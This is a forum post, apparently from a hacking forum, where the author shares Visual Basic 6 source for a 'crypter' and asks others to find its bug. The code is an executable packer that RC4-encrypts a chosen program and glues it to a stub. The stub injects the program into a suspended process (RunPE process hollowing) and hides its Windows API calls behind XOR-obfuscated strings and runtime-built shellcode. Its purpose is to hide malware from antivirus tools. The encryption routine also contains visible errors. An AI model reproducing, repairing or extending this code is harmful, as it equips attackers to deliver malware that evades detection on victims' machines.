Hey there, evil crew
I made a crypter, but it has a problem and I don't know where I went wrong.
Help me out.
Crypter code
Code:
Private Sub Command1_Click() With CD .DialogTitle = "Seleccione el archivo a encryptar" .Filter = "Aplicaciones EXE|*.exe" .ShowOpen End With If Not CD.FileName = vbNullString Then Text1.Text = CD.FileName MsgBox "Server Carregado", vbInformation, Me.Caption End If End Sub Private Sub Command2_Click() Dim Stub As String, Archivo As String If Text1.Text = vbNullString Then MsgBox "Primero debe cargar un archivo para encryptar", vbExclamation, Me.Caption Exit Sub Else Open App.Path & "\Stub.exe" For Binary As #1 Stub = Space(LOF(1)) Get #1, , Stub Close #1 Open Text1.Text For Binary As #1 Archivo = Space(LOF(1)) Get #1, , Archivo Close #1 With CD .DialogTitle = "Selecione la ruta donde desea guardar el archivo" .Filter = "Aplicaciones EXE|*.exe" .ShowSave End With If Not CD.FileName = vbNullString Then Archivo = RC4(Archivo, "DarkJairo60026112") Open CD.FileName For Binary As #1 Put #1, , Stub & "##$$##" & Archivo & "##$$##" Close #1 MsgBox "Seu Server Foi Encryptado Com Sucesso", vbInformation, Me.Caption End If End If End Sub Public Function RC4(ByVal G1B2H6TV As String, ByVal H1I8E5FU As String) As String On Error Resume Next Dim D5B2N7CK(0 To 255) As Integer, P1U0L1RO, X2I0X3SP As Long, T4T5I7IO() As Byte T4T5I7IO = StrConv(H1I8E5FU, vbFromUnicode) For P1U0L1RO = 0 To 255 X2I0X3SP = (X2I0X3SP + D5B2N7CK(P1U0L1RO) + T4T5I7IO(P1U0L1RO Mod Len(H1I8E5FU))) Mod 256 D5B2N7CK(P1U0L1RO) = P1U0L1RO Next P1U0L1RO T4T5I7IO() = StrConv(G1B2H6TV, vbFromUnicode) For P1U0L1RO = 0 To Len(G1B2H6TV) X2I0X3SP = (X2I0X3SP + D5B2N7CK(X2I0X3SP) + 1) Mod 256 T4T5I7IO(P1U0L1RO) = T4T5I7IO(P1U0L1RO) Xor D5B2N7CK(Temp + D5B2N7CK((X2I0X3SP + D5B2N7CK(X2I0X3SP)) Mod 254)) Next P1U0L1RO RC4 = StrConv(T4T5I7IO, vbUnicode) End Function
Runte
Code:
Option Explicit Private Const CONTEXT_FULL As Long = &H10007 Private Const MAX_PATH As Integer = 260 Private Const CREATE_SUSPENDED As Long = &H4 Private Const MEM_COMMIT As Long = &H1000 Private Const MEM_RESERVE As Long = &H2000 Private Const PAGE_EXECUTE_READWRITE As Long = &H40 Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugStringA" (ByVal lpOutputString As String) As Long Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long) Private Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long Private Type SECURITY_ATTRIBUTES nLength As Long lpSecurityDescriptor As Long bInheritHandle As Long End Type Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long 
dwThreadID As Long End Type Private Type FLOATING_SAVE_AREA ControlWord As Long StatusWord As Long TagWord As Long ErrorOffset As Long ErrorSelector As Long DataOffset As Long DataSelector As Long RegisterArea(1 To 80) As Byte Cr0NpxState As Long End Type Private Type CONTEXT ContextFlags As Long Dr0 As Long Dr1 As Long Dr2 As Long Dr3 As Long Dr6 As Long Dr7 As Long FloatSave As FLOATING_SAVE_AREA SegGs As Long SegFs As Long SegEs As Long SegDs As Long Edi As Long Esi As Long Ebx As Long Edx As Long Ecx As Long Eax As Long Ebp As Long Eip As Long SegCs As Long EFlags As Long Esp As Long SegSs As Long End Type Private Type IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res(0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2(0 To 9) As Integer e_lfanew As Long End Type Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer characteristics As Integer End Type Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type Private Type IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long 
SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type Private Type IMAGE_SECTION_HEADER SecName As String * 8 VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer characteristics As Long End Type Public Function SYOSXQL(ByVal TUBB As String, ByVal NICOE As String, ParamArray ODTNTUX()) As Long Dim LURIE As Long, JTVV(&HEC00& - 1) As Byte, XIJ As Long, WTBXUMY As Long WTBXUMY = GetProcAddress(LoadLibraryA(TUBB), NICOE) If WTBXUMY = 0 Then Exit Function LURIE = VarPtr(JTVV(0)) RtlMoveMemory ByVal LURIE, &H59595958, &H4: LURIE = LURIE + 4 RtlMoveMemory ByVal LURIE, &H5059, &H2: LURIE = LURIE + 2 For XIJ = UBound(ODTNTUX) To 0 Step -1 RtlMoveMemory ByVal LURIE, &H68, &H1: LURIE = LURIE + 1 RtlMoveMemory ByVal LURIE, CLng(ODTNTUX(XIJ)), &H4: LURIE = LURIE + 4 Next RtlMoveMemory ByVal LURIE, &HE8, &H1: LURIE = LURIE + 1 RtlMoveMemory ByVal LURIE, WTBXUMY - LURIE - 4, &H4: LURIE = LURIE + 4 RtlMoveMemory ByVal LURIE, &HC3, &H1: LURIE = LURIE + 1 SYOSXQL = CallWindowProcA(VarPtr(JTVV(0)), 0, 0, 0, 0) End Function Public Function NIFHB(ByVal SRHGCP As String, ByVal ZKDMJ As String) As String Dim OQF As Long For OQF = 1 To Len(SRHGCP) NIFHB = NIFHB & Chr(Asc(Mid(ZKDMJ, IIf(OQF Mod Len(ZKDMJ) <> 0, OQF Mod Len(ZKDMJ), Len(ZKDMJ)), 1)) Xor Asc(Mid(SRHGCP, OQF, 1))) Next OQF End Function Public Sub WNUSFLM(ByVal PHIWM As String, ByRef ZWYS() As Byte, RJYXT As String) Dim ZVB As Long, LNNO As IMAGE_DOS_HEADER, LTWSE As IMAGE_NT_HEADERS, QXPNMQ As IMAGE_SECTION_HEADER Dim EPAIKQG As STARTUPINFO, KPIDLM As PROCESS_INFORMATION, SYLBTN As CONTEXT EPAIKQG.cb = Len(EPAIKQG) 
RtlMoveMemory LNNO, ZWYS(0), 64 RtlMoveMemory LTWSE, ZWYS(LNNO.e_lfanew), 248 CreateProcessA PHIWM, " " & RJYXT, 0, 0, False, CREATE_SUSPENDED, 0, 0, EPAIKQG, KPIDLM SYOSXQL NIFHB(Chr(45) & Chr(56) & Chr(47) & Chr(54) & Chr(32), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(13) & Chr(56) & Chr(30) & Chr(52) & Chr(33) & Chr(43) & Chr(51) & Chr(19) & Chr(36) & Chr(34) & Chr(36) & Chr(28) & Chr(32) & Chr(17) & Chr(48) & Chr(43) & Chr(35) & Chr(33) & Chr(57) & Chr(35), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hProcess, LTWSE.OptionalHeader.ImageBase SYOSXQL NIFHB(Chr(40) & Chr(41) & Chr(57) & Chr(52) & Chr(41) & Chr(38) & Chr(112) & Chr(119), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(21) & Chr(37) & Chr(57) & Chr(46) & Chr(57) & Chr(43) & Chr(47) & Chr(4) & Chr(33) & Chr(43) & Chr(60) & Chr(48) & Chr(3) & Chr(58), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hProcess, LTWSE.OptionalHeader.ImageBase, LTWSE.OptionalHeader.SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE WriteProcessMemory KPIDLM.hProcess, ByVal LTWSE.OptionalHeader.ImageBase, ZWYS(0), LTWSE.OptionalHeader.SizeOfHeaders, 0 For ZVB = 0 To LTWSE.FileHeader.NumberOfSections - 1 RtlMoveMemory QXPNMQ, ZWYS(LNNO.e_lfanew + 248 + 40 * ZVB), Len(QXPNMQ) WriteProcessMemory KPIDLM.hProcess, ByVal LTWSE.OptionalHeader.ImageBase + QXPNMQ.VirtualAddress, ZWYS(QXPNMQ.PointerToRawData), QXPNMQ.SizeOfRawData, 0 Next ZVB SYLBTN.ContextFlags = CONTEXT_FULL SYOSXQL NIFHB(Chr(40) & Chr(41) & Chr(57) & Chr(52) & Chr(41) & Chr(38) & Chr(112) & Chr(119), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(4) & Chr(41) & Chr(63) & Chr(14) & Chr(36) & Chr(56) & Chr(38) & Chr(36) & Chr(41) & Chr(4) & Chr(60) & Chr(61) & Chr(50) & Chr(39) & Chr(45) & Chr(60), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hThread, VarPtr(SYLBTN) WriteProcessMemory KPIDLM.hProcess, ByVal SYLBTN.Ebx + 8, LTWSE.OptionalHeader.ImageBase, 4, 0 SYLBTN.Eax = LTWSE.OptionalHeader.ImageBase + 
LTWSE.OptionalHeader.AddressOfEntryPoint SYOSXQL NIFHB(Chr(40) & Chr(41) & Chr(57) & Chr(52) & Chr(41) & Chr(38) & Chr(112) & Chr(119), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(16) & Chr(41) & Chr(63) & Chr(14) & Chr(36) & Chr(56) & Chr(38) & Chr(36) & Chr(41) & Chr(4) & Chr(60) & Chr(61) & Chr(50) & Chr(39) & Chr(45) & Chr(60), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hThread, VarPtr(SYLBTN) SYOSXQL NIFHB(Chr(40) & Chr(41) & Chr(57) & Chr(52) & Chr(41) & Chr(38) & Chr(112) & Chr(119), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), NIFHB(Chr(17) & Chr(41) & Chr(56) & Chr(47) & Chr(33) & Chr(47) & Chr(23) & Chr(45) & Chr(63) & Chr(34) & Chr(50) & Chr(55), "CLKZLJCEMGSSFBUHWHVMZMHJBJXGAXYTLEZYUILW"), KPIDLM.hThread End Sub